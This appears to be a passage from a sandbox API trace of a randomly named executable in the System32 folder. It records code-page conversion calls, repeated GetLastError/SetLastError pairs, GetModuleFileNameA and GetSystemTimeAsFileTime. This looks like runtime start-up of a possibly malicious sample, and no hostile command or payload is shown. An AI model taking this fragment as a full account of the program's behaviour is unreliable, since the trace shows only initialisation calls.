\x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ矲狟Ā", cchSrc=256, lpDestStr=0x24eb68, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0030.961] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x24f344, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿÑg\x90õ|õ$", lpUsedDefaultChar=0x0) returned 256 [0030.961] GetLastError () returned 0x0 [0030.961] SetLastError (dwErrCode=0x0) [0030.961] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x24f444, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0030.961] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x24f444, cbMultiByte=256, lpWideCharStr=0x24ed98, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ矲狟Ā") returned 256 [0030.961] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ矲狟Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0030.961] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ矲狟Ā", cchSrc=256, lpDestStr=0x24eb88, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0030.961] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x24f244, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿÑg\x90õ|õ$", lpUsedDefaultChar=0x0) returned 256 [0030.962] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72e0d9a8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0030.962] GetLastError () returned 0x0 [0030.962] SetLastError (dwErrCode=0x0) [0030.962] GetLastError () returned 0x0 [0030.962] SetLastError (dwErrCode=0x0) [0030.962] GetLastError () returned 0x0 [0030.962] SetLastError (dwErrCode=0x0) [0030.962] GetLastError () returned 0x0 [0030.962] SetLastError (dwErrCode=0x0) [0030.962] GetLastError () returned 0x0 [0030.962] SetLastError (dwErrCode=0x0) [0030.962] GetLastError () returned 0x0 [0030.962] SetLastError (dwErrCode=0x0) [0030.962] GetLastError () returned 0x0 [0030.962] SetLastError (dwErrCode=0x0) [0030.962] GetLastError () returned 0x0 [0030.962] SetLastError (dwErrCode=0x0) [0030.962] GetLastError () returned 0x0 [0030.962] SetLastError (dwErrCode=0x0) [0030.962] GetLastError () returned 0x0 [0030.962] SetLastError (dwErrCode=0x0) [0030.962] GetLastError () returned 0x0 [0030.962] SetLastError (dwErrCode=0x0) [0030.962] GetLastError () returned 0x0 [0030.962] SetLastError (dwErrCode=0x0) [0030.962] GetLastError () returned 0x0 [0030.962] SetLastError (dwErrCode=0x0) [0030.963] GetLastError () returned 0x0 [0030.963] SetLastError (dwErrCode=0x0) [0030.963] GetLastError () returned 0x0 [0030.963] SetLastError (dwErrCode=0x0) [0030.963] GetLastError () returned 0x0 [0030.963] SetLastError (dwErrCode=0x0) [0030.963] GetLastError () returned 0x0 [0030.963] SetLastError (dwErrCode=0x0) [0030.963] GetLastError () returned 0x0 [0030.963] SetLastError (dwErrCode=0x0) [0030.963] GetLastError () returned 0x0 [0030.963] SetLastError (dwErrCode=0x0) [0030.963] GetLastError () returned 0x0 [0030.963] SetLastError (dwErrCode=0x0) [0030.963] GetLastError () returned 0x0 [0030.963] SetLastError (dwErrCode=0x0) [0030.963] GetLastError () returned 0x0 [0030.963] SetLastError (dwErrCode=0x0) [0030.963] GetLastError () returned 0x0 [0030.963] SetLastError (dwErrCode=0x0) [0030.963] GetLastError () returned 0x0 [0030.963] SetLastError (dwErrCode=0x0) [0030.963] GetLastError () returned 0x0 [0030.963] SetLastError (dwErrCode=0x0) [0030.963] GetLastError () returned 0x0 [0030.963] SetLastError (dwErrCode=0x0) [0030.963] GetLastError () returned 0x0 [0030.963] SetLastError (dwErrCode=0x0) [0030.963] GetLastError () returned 0x0 [0030.964] SetLastError (dwErrCode=0x0) [0030.964] GetLastError () returned 0x0 [0030.964] SetLastError (dwErrCode=0x0) [0030.964] GetLastError () returned 0x0 [0030.964] SetLastError (dwErrCode=0x0) [0030.964] GetLastError () returned 0x0 [0030.964] SetLastError (dwErrCode=0x0) [0030.964] GetLastError () returned 0x0 [0030.964] SetLastError (dwErrCode=0x0) [0030.964] GetLastError () returned 0x0 [0030.964] SetLastError (dwErrCode=0x0) [0030.964] GetLastError () returned 0x0 [0030.964] SetLastError (dwErrCode=0x0) [0030.964] GetLastError () returned 0x0 [0030.964] SetLastError (dwErrCode=0x0) [0030.964] GetLastError () returned 0x0 [0030.964] SetLastError (dwErrCode=0x0) [0030.964] GetLastError () returned 0x0 [0030.964] SetLastError (dwErrCode=0x0) [0030.964] GetLastError () returned 0x0 [0030.964] SetLastError (dwErrCode=0x0) [0030.964] GetLastError () returned 0x0 [0030.964] SetLastError (dwErrCode=0x0) [0030.964] GetLastError () returned 0x0 [0030.964] SetLastError (dwErrCode=0x0) [0030.964] GetLastError () returned 0x0 [0030.964] SetLastError (dwErrCode=0x0) [0030.964] GetLastError () returned 0x0 [0030.964] SetLastError (dwErrCode=0x0) [0030.965] GetLastError () returned 0x0 [0030.965] SetLastError (dwErrCode=0x0) [0030.965] GetLastError () returned 0x0 [0030.965] SetLastError (dwErrCode=0x0) [0030.965] GetLastError () returned 0x0 [0030.965] SetLastError (dwErrCode=0x0) [0030.965] GetLastError () returned 0x0 [0030.965] SetLastError (dwErrCode=0x0) [0030.965] GetLastError () returned 0x0 [0030.965] SetLastError (dwErrCode=0x0) [0030.965] GetLastError () returned 0x0 [0030.965] SetLastError (dwErrCode=0x0) [0030.965] GetLastError () returned 0x0 [0030.965] SetLastError (dwErrCode=0x0) [0030.965] GetLastError () returned 0x0 [0030.965] SetLastError (dwErrCode=0x0) [0030.965] GetLastError () returned 0x0 [0030.965] SetLastError (dwErrCode=0x0) [0030.965] GetLastError () returned 0x0 [0030.965] SetLastError (dwErrCode=0x0) [0030.965] GetLastError () returned 0x0 [0030.965] SetLastError (dwErrCode=0x0) [0030.965] GetLastError () returned 0x0 [0030.966] SetLastError (dwErrCode=0x0) [0030.966] GetLastError () returned 0x0 [0030.966] SetLastError (dwErrCode=0x0) [0030.966] GetLastError () returned 0x0 [0030.966] SetLastError (dwErrCode=0x0) [0030.966] GetLastError () returned 0x0 [0030.966] SetLastError (dwErrCode=0x0) [0030.966] GetLastError () returned 0x0 [0030.966] SetLastError (dwErrCode=0x0) [0030.966] GetLastError () returned 0x0 [0030.966] SetLastError (dwErrCode=0x0) [0030.966] GetLastError () returned 0x0 [0030.966] SetLastError (dwErrCode=0x0) [0030.966] GetLastError () returned 0x0 [0030.966] SetLastError (dwErrCode=0x0) [0030.966] GetLastError () returned 0x0 [0030.966] SetLastError (dwErrCode=0x0) [0030.966] GetLastError () returned 0x0 [0030.966] SetLastError (dwErrCode=0x0) [0030.966] GetLastError () returned 0x0 [0030.966] SetLastError (dwErrCode=0x0) [0030.966] GetLastError () returned 0x0 [0030.966] SetLastError (dwErrCode=0x0) [0030.966] GetLastError () returned 0x0 [0030.966] SetLastError (dwErrCode=0x0) [0030.966] GetLastError () returned 0x0 [0030.966] SetLastError (dwErrCode=0x0) [0030.966] GetLastError () returned 0x0 [0030.966] SetLastError (dwErrCode=0x0) [0030.967] GetLastError () returned 0x0 [0030.967] SetLastError (dwErrCode=0x0) [0030.967] GetLastError () returned 0x0 [0030.967] SetLastError (dwErrCode=0x0) [0030.967] GetLastError () returned 0x0 [0030.967] SetLastError (dwErrCode=0x0) [0030.967] GetLastError () returned 0x0 [0030.967] SetLastError (dwErrCode=0x0) [0030.967] GetLastError () returned 0x0 [0030.967] SetLastError (dwErrCode=0x0) [0030.967] GetLastError () returned 0x0 [0030.967] SetLastError (dwErrCode=0x0) [0030.967] GetLastError () returned 0x0 [0030.967] SetLastError (dwErrCode=0x0) [0030.967] GetLastError () returned 0x0 [0030.967] SetLastError (dwErrCode=0x0) [0030.967] GetLastError () returned 0x0 [0030.967] SetLastError (dwErrCode=0x0) [0030.967] GetLastError () returned 0x0 [0030.967] SetLastError (dwErrCode=0x0) [0030.967] GetLastError () returned 0x0 [0030.967] SetLastError (dwErrCode=0x0) [0030.967] GetLastError () returned 0x0 [0030.967] SetLastError (dwErrCode=0x0) [0030.967] GetLastError () returned 0x0 [0030.967] SetLastError (dwErrCode=0x0) [0030.967] GetLastError () returned 0x0 [0030.967] SetLastError (dwErrCode=0x0) [0030.967] GetLastError () returned 0x0 [0030.968] SetLastError (dwErrCode=0x0) [0030.968] GetLastError () returned 0x0 [0030.968] SetLastError (dwErrCode=0x0) [0030.968] GetLastError () returned 0x0 [0030.968] SetLastError (dwErrCode=0x0) [0030.968] GetLastError () returned 0x0 [0030.968] SetLastError (dwErrCode=0x0) [0030.968] GetLastError () returned 0x0 [0030.968] SetLastError (dwErrCode=0x0) [0030.968] GetLastError () returned 0x0 [0030.968] SetLastError (dwErrCode=0x0) [0030.968] GetLastError () returned 0x0 [0030.968] SetLastError (dwErrCode=0x0) [0030.968] GetLastError () returned 0x0 [0030.968] SetLastError (dwErrCode=0x0) [0030.968] GetLastError () returned 0x0 [0030.968] SetLastError (dwErrCode=0x0) [0030.968] GetLastError () returned 0x0 [0030.968] SetLastError (dwErrCode=0x0) [0030.968] GetLastError () returned 0x0 [0030.968] SetLastError (dwErrCode=0x0) [0030.968] GetLastError () returned 0x0 [0030.968] SetLastError (dwErrCode=0x0) [0030.968] GetLastError () returned 0x0 [0030.968] SetLastError (dwErrCode=0x0) [0030.968] GetLastError () returned 0x0 [0030.968] SetLastError (dwErrCode=0x0) [0030.968] GetLastError () returned 0x0 [0030.969] SetLastError (dwErrCode=0x0) [0030.969] GetLastError () returned 0x0 [0030.969] SetLastError (dwErrCode=0x0) [0030.969] GetLastError () returned 0x0 [0030.969] SetLastError (dwErrCode=0x0) [0030.969] GetLastError () returned 0x0 [0030.969] SetLastError (dwErrCode=0x0) [0030.969] GetLastError () returned 0x0 [0030.969] SetLastError (dwErrCode=0x0) [0030.969] GetLastError () returned 0x0 [0030.969] SetLastError (dwErrCode=0x0) [0030.969] GetLastError () returned 0x0 [0030.969] SetLastError (dwErrCode=0x0) [0030.969] GetLastError () returned 0x0 [0030.969] SetLastError (dwErrCode=0x0) [0030.969] GetLastError () returned 0x0 [0030.969] SetLastError (dwErrCode=0x0) [0030.969] GetLastError () returned 0x0 [0030.969] SetLastError (dwErrCode=0x0) [0030.969] GetLastError () returned 0x0 [0030.969] SetLastError (dwErrCode=0x0) [0030.969] GetLastError () returned 0x0 [0030.969] SetLastError (dwErrCode=0x0) [0030.969] GetLastError () returned 0x0 [0030.969] SetLastError (dwErrCode=0x0) [0030.969] GetLastError () returned 0x0 [0030.969] SetLastError (dwErrCode=0x0) [0030.969] GetLastError () returned 0x0 [0030.970] SetLastError (dwErrCode=0x0) [0030.970] GetLastError () returned 0x0 [0030.970] SetLastError (dwErrCode=0x0) [0030.970] GetLastError () returned 0x0 [0030.970] SetLastError (dwErrCode=0x0) [0030.970] GetLastError () returned 0x0 [0030.970] SetLastError (dwErrCode=0x0) [0030.970] GetLastError () returned 0x0 [0030.970] SetLastError (dwErrCode=0x0) [0030.970] GetLastError () returned 0x0 [0030.970] SetLastError (dwErrCode=0x0) [0030.970] GetLastError () returned 0x0 [0030.970] SetLastError (dwErrCode=0x0) [0030.970] GetLastError () returned 0x0 [0030.970] SetLastError (dwErrCode=0x0) [0030.970] GetLastError () returned 0x0 [0030.970] SetLastError (dwErrCode=0x0) [0030.970] GetLastError () returned 0x0 [0030.970] SetLastError (dwErrCode=0x0) [0030.970] GetLastError () returned 0x0 [0030.970] SetLastError (dwErrCode=0x0) [0030.970] GetLastError () returned 0x0 [0030.970] SetLastError (dwErrCode=0x0) [0030.970] GetLastError () returned 0x0 [0030.970] SetLastError (dwErrCode=0x0) [0030.971] GetLastError () returned 0x0 [0030.971] SetLastError (dwErrCode=0x0) [0030.971] GetLastError () returned 0x0 [0030.971] SetLastError (dwErrCode=0x0) [0030.971] GetLastError () returned 0x0 [0030.971] SetLastError (dwErrCode=0x0) [0030.971] GetLastError () returned 0x0 [0030.971] SetLastError (dwErrCode=0x0) [0030.971] GetLastError () returned 0x0 [0030.971] SetLastError (dwErrCode=0x0) [0030.971] GetLastError () returned 0x0 [0030.971] SetLastError (dwErrCode=0x0) [0030.971] GetLastError () returned 0x0 [0030.971] SetLastError (dwErrCode=0x0) [0030.971] GetLastError () returned 0x0 [0030.971] SetLastError (dwErrCode=0x0) [0030.971] GetLastError () returned 0x0 [0030.971] SetLastError (dwErrCode=0x0) [0030.971] GetLastError () returned 0x0 [0030.971] SetLastError (dwErrCode=0x0) [0030.971] GetLastError () returned 0x0 [0030.971] SetLastError (dwErrCode=0x0) [0030.971] GetLastError () returned 0x0 [0030.971] SetLastError (dwErrCode=0x0) [0030.971] GetLastError () returned 0x0 [0030.971] SetLastError (dwErrCode=0x0) [0030.972] GetLastError () returned 0x0 [0030.972] SetLastError (dwErrCode=0x0) [0030.972] GetLastError () returned 0x0 [0030.972] SetLastError (dwErrCode=0x0) [0030.972] GetLastError () returned 0x0 [0030.972] SetLastError (dwErrCode=0x0) [0030.972] GetLastError () returned 0x0 [0030.972] SetLastError (dwErrCode=0x0) [0030.972] GetLastError () returned 0x0 [0030.972] SetLastError (dwErrCode=0x0) [0030.972] GetLastError () returned 0x0 [0030.972] SetLastError (dwErrCode=0x0) [0030.972] GetLastError () returned 0x0 [0030.972] SetLastError (dwErrCode=0x0) [0030.972] GetLastError () returned 0x0 [0030.972] SetLastError (dwErrCode=0x0) [0030.972] GetLastError () returned 0x0 [0030.972] SetLastError (dwErrCode=0x0) [0030.972] GetLastError () returned 0x0 [0030.972] SetLastError (dwErrCode=0x0) [0030.972] GetLastError () returned 0x0 [0030.972] SetLastError (dwErrCode=0x0) [0030.972] GetLastError () returned 0x0 [0030.972] SetLastError (dwErrCode=0x0) [0030.972] GetLastError () returned 0x0 [0030.972] SetLastError (dwErrCode=0x0) [0030.972] GetLastError () returned 0x0 [0030.972] SetLastError (dwErrCode=0x0) [0030.972] GetLastError () returned 0x0 [0030.973] SetLastError (dwErrCode=0x0) [0030.973] GetLastError () returned 0x0 [0030.973] SetLastError (dwErrCode=0x0) [0030.973] GetLastError () returned 0x0 [0030.973] SetLastError (dwErrCode=0x0) [0030.973] GetLastError () returned 0x0 [0030.973] SetLastError (dwErrCode=0x0) [0030.973] GetLastError () returned 0x0 [0030.973] SetLastError (dwErrCode=0x0) [0030.973] GetLastError () returned 0x0 [0030.973] SetLastError (dwErrCode=0x0) [0030.973] GetLastError () returned 0x0 [0030.973] SetLastError (dwErrCode=0x0) [0030.973] GetLastError () returned 0x0 [0030.973] SetLastError (dwErrCode=0x0) [0030.973] GetLastError () returned 0x0 [0030.973] SetLastError (dwErrCode=0x0) [0030.973] GetLastError () returned 0x0 [0030.973] SetLastError (dwErrCode=0x0) [0030.973] GetLastError () returned 0x0 [0030.973] SetLastError (dwErrCode=0x0) [0030.973] GetLastError () returned 0x0 [0030.973] SetLastError (dwErrCode=0x0) [0030.973] GetLastError () returned 0x0 [0030.973] SetLastError (dwErrCode=0x0) [0030.973] GetLastError () returned 0x0 [0030.973] SetLastError (dwErrCode=0x0) [0030.973] GetLastError () returned 0x0 [0030.973] SetLastError (dwErrCode=0x0) [0030.973] GetLastError () returned 0x0 [0030.974] SetLastError (dwErrCode=0x0) [0030.974] GetLastError () returned 0x0 [0030.974] SetLastError (dwErrCode=0x0) [0030.974] GetLastError () returned 0x0 [0030.974] SetLastError (dwErrCode=0x0) [0030.974] GetLastError () returned 0x0 [0030.974] SetLastError (dwErrCode=0x0) [0030.974] GetLastError () returned 0x0 [0030.974] SetLastError (dwErrCode=0x0) [0030.974] GetLastError () returned 0x0 [0030.974] SetLastError (dwErrCode=0x0) [0030.974] GetLastError () returned 0x0 [0030.974] SetLastError (dwErrCode=0x0) [0030.974] GetLastError () returned 0x0 [0030.974] SetLastError (dwErrCode=0x0) [0030.974] GetLastError () returned 0x0 [0030.974] SetLastError (dwErrCode=0x0) [0030.974] GetLastError () returned 0x0 [0030.974] SetLastError (dwErrCode=0x0) [0030.974] GetLastError () returned 0x0 [0030.974] SetLastError (dwErrCode=0x0) [0030.974] GetLastError () returned 0x0 [0030.974] SetLastError (dwErrCode=0x0) [0030.974] GetLastError () returned 0x0 [0030.974] SetLastError (dwErrCode=0x0) [0030.974] GetLastError () returned 0x0 [0030.974] SetLastError (dwErrCode=0x0) [0030.974] GetLastError () returned 0x0 [0030.975] SetLastError (dwErrCode=0x0) [0030.975] GetLastError () returned 0x0 [0030.975] SetLastError (dwErrCode=0x0) [0030.975] GetLastError () returned 0x0 [0030.975] SetLastError (dwErrCode=0x0) [0030.975] GetLastError () returned 0x0 [0030.975] SetLastError (dwErrCode=0x0) [0030.975] GetLastError () returned 0x0 [0030.975] SetLastError (dwErrCode=0x0) [0030.975] GetLastError () returned 0x0 [0030.975] SetLastError (dwErrCode=0x0) [0030.975] GetLastError () returned 0x0 [0030.975] SetLastError (dwErrCode=0x0) [0030.975] GetLastError () returned 0x0 [0030.975] SetLastError (dwErrCode=0x0) [0030.975] GetLastError () returned 0x0 [0030.975] SetLastError (dwErrCode=0x0) [0030.975] GetLastError () returned 0x0 [0030.975] SetLastError (dwErrCode=0x0) [0030.975] GetLastError () returned 0x0 [0030.975] SetLastError (dwErrCode=0x0) [0030.976] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x761d0000 [0030.976] GetProcAddress (hModule=0x761d0000, lpProcName="IsProcessorFeaturePresent") returned 0x762276b5 [0030.976] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0030.977] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x24f5c0 | out: lpSystemTimeAsFileTime=0x24f5c0*(dwLowDateTime=0xe02f1750, dwHighDateTime=0x1d3dfba)) [0030.977] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x24f4f8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0030.978] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x24f3e0, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0030.978] GetLastError () returned 0x0 [0030.978] GetLastError () returned 0x0 [0030.978] GetLastError () returned 0x0 [0030.978] GetLastError () returned 0x0 [0030.978] GetLastError () returned 0x0 [0030.978] GetLastError () returned 0x0 [0030.978] GetLastError () returned 0x0 [0030.978] GetLastError () returned 0x0 [0030.978] GetLastError () returned 0x0 [0030.978] GetLastError () returned 0x0 [0030.978] GetLastError () returned 0x0 [0030.978] GetLastError () returned 0x0 